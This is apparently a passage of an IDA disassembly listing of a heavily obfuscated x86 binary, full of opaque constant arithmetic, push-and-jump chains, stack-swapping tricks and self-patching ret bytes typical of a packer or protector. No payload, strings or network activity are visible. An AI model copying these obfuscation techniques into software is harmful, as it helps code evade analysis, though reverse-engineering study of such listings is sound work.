		add	ebx, 1AC90DE1h
		mov	[ebx], eax
		pop	ebx
		jmp	loc_43D08E

; =============== S U B	R O U T	I N E =======================================



sub_44D006	proc near		; DATA XREF: y2kk37jd:00456D24o
		push	ebp
		mov	ebp, esi
		push	offset sub_43C4A9
		jmp	loc_4598FC
sub_44D006	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB6D

loc_44D013:				; CODE XREF: sub_44FB6D:loc_451136j
		push	offset loc_44A5AA
		jmp	nullsub_106
; END OF FUNCTION CHUNK	FOR sub_44FB6D

; =============== S U B	R O U T	I N E =======================================



sub_44D01D	proc near		; CODE XREF: y2kk37jd:004571D7p
					; y2kk37jd:0045A5E0j
		xchg	edi, [esp+0]
		pop	edi
		push	eax
		call	sub_4526B7
		retn
sub_44D01D	endp

; ---------------------------------------------------------------------------
		jns	loc_451FDA
		push	edx
		jmp	loc_442AF8
; ---------------------------------------------------------------------------

locret_44D034:				; CODE XREF: y2kk37jd:0045B883j
		retn
; ---------------------------------------------------------------------------

loc_44D035:				; CODE XREF: y2kk37jd:0044C635j
		jmp	locret_4545D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4483B5

loc_44D03A:				; CODE XREF: sub_4483B5+14j
		jmp	nullsub_442
; END OF FUNCTION CHUNK	FOR sub_4483B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44D03F:				; CODE XREF: sub_43E049+420Ej
					; sub_4448E2:loc_4558ACj
		pushf

loc_44D040:				; CODE XREF: sub_43E049:loc_445D3Bj
		mov	eax, [ebp+var_C]
		call	sub_449129

loc_44D048:				; CODE XREF: sub_44AA4A+D8C9j
		jmp	loc_457DA6
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_44D04D:				; CODE XREF: sub_43F770+88BEj
		jmp	nullsub_72
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_44D052:				; CODE XREF: sub_453583:loc_443310j
		pop	edi
		or	edi, 6C8C320Ch
		jnz	loc_44A118

loc_44D05F:				; CODE XREF: sub_44461D+16F16j
		jmp	loc_446FAA
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_44D064:				; CODE XREF: sub_44606C+7D03j
		jmp	loc_459BB4
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
		not	edi
		xor	ecx, 955A4CD9h
		jmp	loc_44A115
; ---------------------------------------------------------------------------

loc_44D076:				; DATA XREF: sub_43F770+88B9o
		push	1D10BE27h
		pop	edx
		or	edx, 0EC434C40h
		test	edx, 80000000h
		jmp	loc_447D55
; ---------------------------------------------------------------------------
		xor	ecx, 6113B92Fh
		jmp	sub_43EA8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44D098:				; CODE XREF: sub_4458DD:loc_442EC7j
		or	edx, 0F4A64C8Ah
		add	edx, 0B9DB1DEh
		popf
		xchg	edx, [esp-0Ch+arg_8]
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44D0AD	proc near		; DATA XREF: y2kk37jd:00457B05o

; FUNCTION CHUNK AT 00454AC6 SIZE 00000005 BYTES

		lea	eax, sub_44F086
		mov	byte ptr [eax],	0C3h
		jmp	loc_454AC6
sub_44D0AD	endp


; =============== S U B	R O U T	I N E =======================================



sub_44D0BB	proc near		; CODE XREF: sub_4198C0+B1p
					; sub_44D0BB+5j
					; DATA XREF: ...
		call	sub_456A36
		jmp	ds:off_41E1F4
sub_44D0BB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_44D0C6:				; CODE XREF: sub_44A298+8F8j
		jmp	loc_45A6F9
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44D0CB:				; CODE XREF: sub_43C851+Fj
		jmp	loc_4446D4
; END OF FUNCTION CHUNK	FOR sub_43C851
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_515. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_44D0D2:				; CODE XREF: sub_453B0B+7DAFj
		jmp	loc_458420
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E648

loc_44D0D7:				; CODE XREF: sub_44E648-2634j
		jmp	loc_44B337
; END OF FUNCTION CHUNK	FOR sub_44E648

; =============== S U B	R O U T	I N E =======================================



sub_44D0DC	proc near		; CODE XREF: sub_456809-930Dp
					; sub_456809:loc_459F27p
		push	offset loc_458623
		jmp	nullsub_73
sub_44D0DC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44D0E6:				; CODE XREF: sub_44C4BC:loc_457855j
		jnz	loc_458C7A
		jmp	loc_44339E
; END OF FUNCTION CHUNK	FOR sub_44C4BC

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44D0F1	proc near		; DATA XREF: sub_43BB55+C0C2o

; FUNCTION CHUNK AT 0044E725 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	offset sub_44314E
		jmp	loc_44E725
sub_44D0F1	endp

; ---------------------------------------------------------------------------

loc_44D104:				; CODE XREF: y2kk37jd:00440C4Cj
		or	ebp, edx
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_44D106:				; CODE XREF: sub_44201B:loc_440C32j
		add	ecx, 937838B8h
		sub	ecx, 160641B4h
		xor	ecx, 0F237D1E6h
		add	edx, ecx
		pop	ecx
		mov	[edx], eax
		pop	edx
		jmp	loc_458B90
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_44D123:				; CODE XREF: sub_45ADEC-17080j
		sub	ebp, 0C2D00425h
		mov	ecx, 0A7C52D91h
		sub	ebp, eax
		jle	sub_453E7A

loc_44D136:				; CODE XREF: sub_45ADEC:loc_4439CBj
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_459F8C
		jmp	loc_4481EA
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_44D147:				; CODE XREF: sub_453B0B:loc_446814j
		add	ecx, 0A0806E2Bh
		sub	eax, ecx
		pop	ecx
		rol	eax, 1
; END OF FUNCTION CHUNK	FOR sub_453B0B
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_44D152:				; CODE XREF: sub_44A33C+23A8j
		add	eax, 0C083CAB2h
		call	sub_43C865

loc_44D15D:				; CODE XREF: sub_44C8B5:loc_44C8BDj
		jmp	nullsub_360
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFAE

loc_44D162:				; CODE XREF: sub_43BFAE+AEEj
		jz	loc_456CEF
		and	edx, eax
		xor	edi, 3CA55AD3h
		jmp	loc_456CED
; END OF FUNCTION CHUNK	FOR sub_43BFAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_44D175:				; CODE XREF: sub_448DCA-A05Ej
		cmp	eax, 34B24889h
		jmp	loc_45923B
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_44D180:				; CODE XREF: sub_43E1E9:loc_454D51j
		add	edi, 0C03DB533h
		xchg	edi, [esp-4+arg_0]
		jmp	loc_443C3D
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_390. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C03C

loc_44D18F:				; CODE XREF: sub_45C03C+11j
		jmp	loc_444C03
; END OF FUNCTION CHUNK	FOR sub_45C03C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D194:				; CODE XREF: sub_445226+9F6Fj
		jmp	loc_44D50E
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44D199:				; CODE XREF: y2kk37jd:004428EFj
		jmp	loc_4551DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449775

loc_44D19E:				; CODE XREF: sub_449775+5j
		push	7B63CBEAh
		pop	ebx
		and	ebx, 0BBB6BE82h
		or	ebx, 0AB8C9DABh
		jmp	loc_447711
; END OF FUNCTION CHUNK	FOR sub_449775
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_44D1B5:				; CODE XREF: sub_451A35:loc_43DBAFj
		jl	loc_43E1AD

loc_44D1BB:				; CODE XREF: sub_44896B+3A66j
					; y2kk37jd:loc_455BD7j
		jmp	loc_442BE8
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441070

loc_44D1C0:				; CODE XREF: sub_441070+7j
		jmp	nullsub_297
; END OF FUNCTION CHUNK	FOR sub_441070
; ---------------------------------------------------------------------------
		or	ebp, edi
		or	esi, 9C9E0522h
		adc	esi, ebp
		jmp	loc_43E1AD

; =============== S U B	R O U T	I N E =======================================



sub_44D1D4	proc near		; CODE XREF: sub_448718:loc_452C45j

; FUNCTION CHUNK AT 00442C21 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004492DC SIZE 00000005 BYTES

		add	esp, 0FFFFFEF4h
		push	0FFh
		push	449C0F9Ch
		pop	eax
		sub	eax, 78C8C9E2h
		jmp	loc_4492DC
sub_44D1D4	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_193. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D1F1:				; DATA XREF: sub_455613-15EFo
		movzx	eax, word ptr [eax]
		and	eax, 0FFFF7FFFh
		add	eax, [ebp-0Ch]
		push	edi
		push	0DB527D2Ah
		pop	edi
		xor	edi, 75F9A4D5h
		jmp	loc_43C246
; ---------------------------------------------------------------------------

loc_44D20E:				; CODE XREF: y2kk37jd:loc_43CD64j
		add	eax, [ebp-14h]
		cmp	eax, [ebp-0Ch]
		ja	loc_447E9F

loc_44D21A:				; CODE XREF: y2kk37jd:004404AAj
		cmp	dword ptr [ebp-8], 0A22F8A70h
		jz	loc_459FF4
		mov	eax, [ebp-0Ch]
		jmp	loc_459FEF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_44D22F:				; CODE XREF: sub_44B508:loc_4527DFj
		rol	eax, 1Dh
		or	eax, 0C87000A1h
		add	eax, 114FD347h
		xchg	eax, [esp+4+var_4]
		jmp	sub_447977
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
		mov	edx, 1AE260E8h
		push	ecx
		push	9ED5B489h
		jmp	loc_44891D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432FD

loc_44D256:				; CODE XREF: sub_4432FD:loc_441D64j
		inc	dword ptr [ebp-0Ch]
		dec	dword ptr [ebp-18h]
		jnz	loc_453900
		jmp	loc_440359
; END OF FUNCTION CHUNK	FOR sub_4432FD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44D268:				; CODE XREF: y2kk37jd:0043E146j
		jmp	loc_451222
; ---------------------------------------------------------------------------
		call	sub_43C044
; START	OF FUNCTION CHUNK FOR sub_450203

loc_44D272:				; CODE XREF: sub_44AC89:loc_445DA6j
					; sub_450203+487Fj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_450203
; ---------------------------------------------------------------------------

loc_44D277:				; CODE XREF: y2kk37jd:004486ACj
		jmp	nullsub_481
; ---------------------------------------------------------------------------

loc_44D27C:				; CODE XREF: y2kk37jd:loc_4465ADj
		jz	loc_43EA12
		sbb	edx, edi
		cmp	ecx, 8E4ABC2Eh
		jmp	loc_45176E
; ---------------------------------------------------------------------------
		sbb	edi, edx
		jo	loc_43C07F
		jmp	sub_442ED1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_44D29C:				; CODE XREF: sub_43B765:loc_44048Ej
		mov	ebp, [edi]
		jmp	loc_43E08A
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
		db 2Fh
dword_44D2A4	dd 0DD609C77h		; DATA XREF: sub_445226:loc_43E97Ar
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447041

loc_44D2A8:				; CODE XREF: sub_447041+31B0j
		jmp	loc_44C122
; END OF FUNCTION CHUNK	FOR sub_447041
; ---------------------------------------------------------------------------

loc_44D2AD:				; CODE XREF: y2kk37jd:0043E49Fj
		jmp	locret_44C941
; ---------------------------------------------------------------------------
		dw 0CF13h
dword_44D2B4	dd 77DD0000h		; DATA XREF: sub_444E83+6r
					; y2kk37jd:0044DCFFw ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44D2B8:				; CODE XREF: sub_445787+1491j
		jmp	loc_4458EE
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		db 41h,	0FEh, 47h
		dd 0B0EC4658h, 23994B1Ch, 0B136C817h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44723A

loc_44D2CD:				; CODE XREF: sub_44723A+1439Ej
		jmp	loc_444C8B
; END OF FUNCTION CHUNK	FOR sub_44723A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45833C

loc_44D2D2:				; CODE XREF: sub_45833C+10j
					; y2kk37jd:0045840Bj
		jmp	loc_43DF6C
; END OF FUNCTION CHUNK	FOR sub_45833C
; ---------------------------------------------------------------------------
		db 3Ah
dword_44D2D8	dd 0CF5B8EFBh		; DATA XREF: sub_44AA4A+7r
					; y2kk37jd:004581D1w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44D2DC:				; CODE XREF: sub_453867+63B3j
		jmp	loc_43F2A5
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		db 2Ah,	48h, 0D6h
dword_44D2E4	dd 1A3BEEBh		; DATA XREF: sub_43F75D+B1BFw
					; sub_457533:loc_44E2DCr
dword_44D2E8	dd 0F0EFBACh		; DATA XREF: sub_43CA5B-2B3w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_44D2EC:				; CODE XREF: sub_458DD9-5D2Aj
					; y2kk37jd:loc_45A85Fj
		jmp	loc_4598AF
; END OF FUNCTION CHUNK	FOR sub_458DD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44D2F1:				; CODE XREF: sub_43F911+2B94j
					; sub_43F8B8+14622j
		jmp	loc_43EC33
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
		dw 0FE01h
dword_44D2F8	dd 0AC144EFBh		; DATA XREF: sub_43C7B9+4271r
					; sub_43C7B9+1159Dw
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_432. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44D2FD:				; CODE XREF: sub_4458DD+7236j
		jmp	loc_455B73
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44D302	proc near		; CODE XREF: sub_4492F7-C8EAp
					; y2kk37jd:00445B79j

; FUNCTION CHUNK AT 0043EDDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF89 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00441114 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443493 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004441E6 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00445CA7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044901E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B348 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044B73C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F096 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045083F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450848 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045149B SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00452467 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452E62 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045431B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455E4E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00456F9D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045929D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A2F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B633 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BA9B SIZE 00000015 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		jz	loc_45929D
		jmp	loc_456F9D
sub_44D302	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_44D311:				; CODE XREF: sub_4492F7+1AB5j
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_44FC88[eax*4]
		mov	[ebp-8], eax
		jmp	loc_44719E
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D326:				; CODE XREF: sub_445226:loc_455EC8j
		jnz	loc_45AA05
		jmp	loc_4443F9
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44D331:				; CODE XREF: sub_43F2F2:loc_43F6FDj
					; sub_43F2F2:loc_4402DDj ...
		push	offset loc_450C1C
		jmp	loc_45A6F4
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B60B

loc_44D33B:				; CODE XREF: sub_45B60B:loc_43FDABj
		push	edx
		push	752D9F46h
		pop	edx
		and	edx, 0F450C11Ch
		add	edx, 8C441E99h
		jmp	loc_441A03
; END OF FUNCTION CHUNK	FOR sub_45B60B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_368. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44D354:				; CODE XREF: sub_45B7AA-EA0Bj
		jmp	loc_44FBDF
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED32

loc_44D359:				; CODE XREF: sub_43ED32+15j
					; y2kk37jd:loc_44313Aj
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_44D35B:				; CODE XREF: sub_43ED32+7j
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-0Ch], 4
		jmp	loc_44DE68
; END OF FUNCTION CHUNK	FOR sub_43ED32
; ---------------------------------------------------------------------------

loc_44D367:				; CODE XREF: y2kk37jd:0044EB7Dj
		test	ebp, esi
		jmp	loc_459D87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_44D36E:				; CODE XREF: sub_457FDC:loc_445999j
					; sub_457FDC-937Fj
		mov	eax, 0DD960900h
		call	sub_442C3E
		push	offset loc_446945
		jmp	loc_44CF31
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5BD

loc_44D382:				; CODE XREF: sub_43F5BD+19BDCj
		mov	edx, [ebp-4]
		push	offset loc_456DC3
		jmp	loc_4462EA
; END OF FUNCTION CHUNK	FOR sub_43F5BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44D38F:				; CODE XREF: sub_44B814:loc_43CD26j
		jnz	loc_45538A
		jmp	loc_43D066
; END OF FUNCTION CHUNK	FOR sub_44B814
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_490. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44D39B	proc near		; CODE XREF: y2kk37jd:00440035j
					; sub_45A40E+7p

; FUNCTION CHUNK AT 00445CAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F5EF SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044F65B SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		push	eax
		push	55EA2D51h
		pop	eax
		jmp	loc_44F5EF
sub_44D39B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_44D3AC:				; CODE XREF: sub_43C054+1711Ej
		jo	loc_457DB3
		mov	eax, edi
		mov	[ecx], eax

loc_44D3B6:				; CODE XREF: sub_43C054:loc_4460BAj
		lea	edx, [ebp-14h]
		jmp	loc_450E73
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A22C

loc_44D3BE:				; CODE XREF: sub_45A22C:loc_45A231j
		mov	[ebx], edx
		jmp	loc_44547F
; END OF FUNCTION CHUNK	FOR sub_45A22C
; ---------------------------------------------------------------------------
		xor	edx, 61453AB1h

loc_44D3CB:				; CODE XREF: y2kk37jd:loc_45BBC6j
		jmp	sub_44E95F

; =============== S U B	R O U T	I N E =======================================



sub_44D3D0	proc near		; CODE XREF: sub_4436E7+3j

var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043D847 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043E1A3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044242D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447622 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447E89 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DF3B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8DE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458B17 SIZE 0000000B BYTES

		add	esp, 0FFFFFFF8h
		push	edi
		or	edi, ebx
		jmp	loc_447E89
sub_44D3D0	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_44D3DC:				; CODE XREF: sub_4597AE-1CD2Aj
		jmp	sub_4553C1
; END OF FUNCTION CHUNK	FOR sub_4597AE

; =============== S U B	R O U T	I N E =======================================



sub_44D3E1	proc near		; DATA XREF: y2kk37jd:loc_4456ECo
		push	0B9672790h
		pop	eax
		rol	eax, 4
		and	eax, 5082CC95h
		jmp	loc_45B46A
sub_44D3E1	endp

; ---------------------------------------------------------------------------

loc_44D3F5:				; CODE XREF: y2kk37jd:00446773j
		shr	ecx, 2
		sbb	esi, 0FE4F526h
		jp	loc_450E55
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_44D404:				; CODE XREF: sub_44B814:loc_446757j
		sub	esi, 6BC4FA4h
		xor	esi, 0C7C36C34h
		or	esi, 664F25CDh
		jmp	loc_4427C5
; END OF FUNCTION CHUNK	FOR sub_44B814

; =============== S U B	R O U T	I N E =======================================



sub_44D41B	proc near		; DATA XREF: y2kk37jd:00444980o

; FUNCTION CHUNK AT 004583AF SIZE 00000005 BYTES

		mov	ds:off_41E160, eax
		lea	eax, sub_4543EF
		mov	byte ptr [eax],	0C3h
		jmp	loc_4583AF
sub_44D41B	endp

; ---------------------------------------------------------------------------
		call	nullsub_519
		jmp	ds:dword_41E164
; ---------------------------------------------------------------------------

loc_44D43A:				; CODE XREF: y2kk37jd:00459C70j
		jmp	loc_4515A9
; ---------------------------------------------------------------------------

loc_44D43F:				; CODE XREF: y2kk37jd:00457609j
		jmp	loc_4594E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44D444:				; CODE XREF: sub_456809-15C0Aj
		jmp	loc_453C6C
; END OF FUNCTION CHUNK	FOR sub_456809
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_519. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		js	loc_4587F8
		mov	eax, [esp]
		jmp	loc_454B99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_44D458:				; CODE XREF: sub_44A33C:loc_44A348j
		or	edx, 6F1C9673h
		jmp	loc_45AF47
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_44D463:				; CODE XREF: sub_4518C3-13019j
		mov	ecx, edx
		jmp	loc_43C379
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_44D46A:				; CODE XREF: sub_44107E+10FC5j
		jnp	loc_4427DE
		xchg	ecx, edx
		jmp	loc_44444A
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_44D477:				; CODE XREF: sub_44594E-5477j
		cdq
		jmp	loc_45A9B7
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44D47D:				; CODE XREF: sub_43F8B8:loc_45A76Dj
		mov	edx, esi
		pop	esi

loc_44D480:				; CODE XREF: y2kk37jd:loc_45972Fj
		or	edx, 0F5E7246Bh
		rol	edx, 8
		jmp	loc_447E9A
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_44D48E:				; CODE XREF: y2kk37jd:0044BB8Bj
		lea	eax, [ebp-8]
		push	eax
		push	873CAC16h
		pop	eax
		jmp	loc_43DFB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45704E

loc_44D49D:				; CODE XREF: sub_45704E:loc_45B408j
		sub	eax, 47010B2Dh
		or	eax, 0F60C5D43h
		add	eax, 8576B35h
		mov	eax, [eax]
		push	offset loc_448461
		jmp	loc_45994B
; END OF FUNCTION CHUNK	FOR sub_45704E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_44D4BB:				; CODE XREF: sub_4429DD:loc_4528A2j
		lea	eax, [ebp-125h]
		push	eax
		call	sub_4476EE
		mov	[ebp-4], eax
; END OF FUNCTION CHUNK	FOR sub_4429DD
; START	OF FUNCTION CHUNK FOR sub_451C21

loc_44D4CA:				; CODE XREF: sub_451C21:loc_443B49j
					; sub_4429DD+CB08j ...
		mov	eax, [ebp-1Ch]
		call	sub_441856
		mov	[ebp-8], eax
		jmp	loc_451018
; END OF FUNCTION CHUNK	FOR sub_451C21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D4DA:				; CODE XREF: sub_445226+16525j
		mov	ebx, 0B80C61CDh
		js	loc_43FB18

loc_44D4E5:				; CODE XREF: sub_445226:loc_442D8Dj
		push	0CF00F2A1h
		mov	eax, 2B42566h
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44D4EF:				; CODE XREF: sub_44113A:loc_44634Fj
		jmp	loc_43B39F
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44D4F4:				; CODE XREF: sub_456809-1A4ECj
		not	ebp
		rol	edx, 15h

loc_44D4F9:				; CODE XREF: sub_456809:loc_4483F7j
		mov	eax, [ebp-8]
		call	sub_44D0DC
; END OF FUNCTION CHUNK	FOR sub_456809
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44D501:				; CODE XREF: sub_4432FD-6CEEj
					; sub_43F911-1B1Ej ...
		mov	esp, ebp
		xchg	esi, [esp-4+arg_0]
		mov	ebp, esi

loc_44D508:				; CODE XREF: y2kk37jd:0045ABB0j
		pop	esi
		jmp	loc_44A712
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D50E:				; CODE XREF: sub_445226:loc_44D194j
		call	sub_447407

loc_44D513:				; CODE XREF: sub_45484D-365Ej
		jmp	loc_43C831
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_241. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_238. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
